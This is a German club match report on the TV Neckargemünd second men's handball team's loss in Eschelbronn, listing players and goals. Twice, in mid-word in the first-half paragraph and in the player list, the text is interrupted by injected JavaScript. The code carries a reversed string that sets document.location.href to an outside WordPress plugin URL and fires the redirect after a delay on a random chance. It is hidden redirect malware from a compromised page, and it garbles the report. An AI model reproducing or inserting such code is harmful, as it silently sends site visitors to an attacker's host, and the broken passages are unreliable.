Herren II: Kampf auf verlorenem Posten

Unter denkbar ungünstigen Voraussetzungen musste die zweite Herrenmannschaft des TV Neckargemünd am Sonntag Abend in Eschelbronn ran.
Neckargemünd, 18.11.13 (bki) – Die „Jungen“ mussten zeitgleich mit der ersten Mannschaft in Wiesloch spielen und vom Rest waren fünf krank. Mit Nils Berner konnte wenigstens ein Auswechselspieler gefunden werden.

Die Gastgeber waren uns körperlich deutlich überlegen und es war eigentlich nur die Frage wie hoch die Niederlage wird. Aber wie so oft ist nichts wie es zunächst scheint.

Es dauerte bis zu siebten Minute ehe der erste Treffer gelang. Durch eine starke Defensiv Leistung gelang es Eschelbronn nicht sich abzusetzen.Trotzdem war es für uns ohne gelernte Rückraumspieler extrem schwer zum Torerfolg zu kommen. In der ersten Halbzeit gelangen uns nur drei Feldtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore.

Nach dem Wechsel drohte dann das Unheil seinen Lauf zu nehmen und Eschelbronn erzielte drei schnelle Tore in Folge. Letztlich war dies nur ein Strohfeuer und wir konnten den Rückstand immer bei 2-3 Toren halten.

Leider waren wir im Angriff personell nie in der Lage den schwachen Eschelbronnern das Heft aus der Hand zu nehmen.
Daß dann nach dem Spiel die Duschen nur über fließend kalt Wasser verfügten, setzte dem Ganzen die Krone auf.

Für den TVN kämpften auf verlorenem Posten:
Im Tor: Michael Scriba, Bastian Kirschmer
Im Feld: Alexander Stephan (4/1), Ulrich Weitzel (4/3), Istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Golic, Tim Scriba (1/1), Bernd Wolfbeiß (5/2), Tobias Coelljan, Nils Berner (2)